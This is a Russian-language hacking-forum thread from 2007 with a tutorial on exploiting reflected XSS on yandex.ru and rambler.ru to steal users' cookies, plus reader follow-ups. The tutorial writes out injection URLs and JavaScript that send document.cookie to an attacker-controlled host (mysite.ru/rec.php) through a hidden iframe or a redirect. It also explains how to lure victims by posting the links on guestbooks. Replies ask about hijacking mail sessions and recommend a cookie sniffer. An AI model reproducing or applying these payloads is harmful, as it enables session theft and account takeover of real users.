![]() |
Возможность использования xss на yandex.ru и rambler.ru
Эта статься посвящена в основном новичкам. Я в ней описываю вариант использования XSS на 2х известных ресурсах рунета в подробностях, чтобы всё неясное стало ясным. В статье представлено все необходимое для проведения полноценной атаки типа XSS кража куки, но это не значит, что её надо реализовывать и воровать чужие данные. Я лишь пытаюсь показать, что и у таких крупных ресурсов есть свои дыры.
В один из приятных летних вечеров я, как обычно =), зашел на один из форумов по инф. безопасности...Зашел в раздел XSS, увидел туеву хучу уязвимостей на разных сайтах. Ну, подумал я, не любоваться же на них, и начал искать известный сайтик, чтобы провести полноценную атаку =) Но, собственно, меня не интересовали сайты типа kirpich.org.com.net.ru или forum.gallery.garazhiki.us.ua.up.ui.ut, а хотелось чего-то более известного и раскрученного, чем пользуются большинство обычных юзеров...Вскоре на страницах форума я нашёл xss на яндексе и рамблере, что не могло не радовать =) Вот они: Код:
http://www.rambler.ru/db/support/feedback.shtml?name="<script>alert(/hello, dear user!!!/)</script>Надо их использовать для своих целей, правильно? А иначе нахрена бы они нам сдались =) Так вот, немного подумав, переписал XSS следующим образом: Код:
http://www.rambler.ru/db/support/feedback.shtml?name="<script src=http://mysite.ru/1.js></script>Даже не спрашивайте, почему я написал по-разному...Сам хз, так легли звёзды =) Разберём XSS на www.rambler.ru: Код:
http://www.rambler.ru/db/support/feedback.shtml?name="<script src=http://mysite.ru/1.js></script>Код:
src="'+'http://mysite.ru/rec.php'+'?['+location.host+']:'+document.cookie+'";Код:
h=['+location.host+']:'+document.cookie+Вот сорц самого 1.js: Код:
document.write('<iframe width=1 height=1 style="position: absolute; visibility: hidden;" src="'+'http://mysite.ru/rec.php'+'?['+location.host+']:'+document.cookie+'"></iframe>');Теперь разберём XSS на яндексе: Код:
http://www.nco.yandex.ru/?&sort=<script><script>document.location.replace('http://mysite.ru/rec.php?'+document.cookie);</script>И самое главное, разберём, что же написано в самом пхп-скрипте: Код Код:
<?phpПосле всего проделанного выше, регистрируемся на любом бесплатном хостинге с поддержкой пхп и размещаем в нужном месте нужные файлы. Потом берём подготовленные XSS-ссылки, ищем пару-тройку гостевых книг и пишем там всякую лабуду, вызываюшую интерес, страх и лень(качества присущие всем (= ), и вставляем ссылки =) После того, как юзер зайдет на ссылку у нас остаются логи, прилизительно следующего содержания: Код:
_________[05.09.07 15:12]Код:
http://www.nco.yandex.ru/?&sort=%3C%73%63%72%69%70%74%3E%3C%73%63%72%69%70%74%3E%64%6F%63%75%6D(с) FoST 12.9.2007, 20:47 Впервые статья была опубликована здесь http://forum.prologic.su/index.php?showtopic=1263 |
Нупский вопрос - а он не ворует куки получается:? По крайней мере в логах не увидел
|
Цитата:
в пхп у нас написано вот что: PHP код:
Код:
http://your_site.net/script.php?some_textКод:
h=[www.some_site.ru]:hotlog=1Если ещё не понятно, спрашивай, отвечу. |
Вот такой вопрос - например я передал ссылку кому-нить, он на неё зашёл - и в лог сохранился куки - а к какой страничке относился этот куки ?
|
Цитата:
|
Можно поподробнее про сессию ящика ??...
|
Цитата:
Форум АНТИЧАТ > ИНФО > Статьи |
Ща я читаю вот это: :)
http://forum.antichat.ru/thread32872.html |
Очень удобный снифер находится по адресу
http://s.netsec.ru/ |
Блин, что-то на рамблере, у мну не пахаит Document.Location.Replace. Зато Document.Location.Href работает. Как через последнее можно передать cookies? :rolleyes:
|
| Время: 04:27 |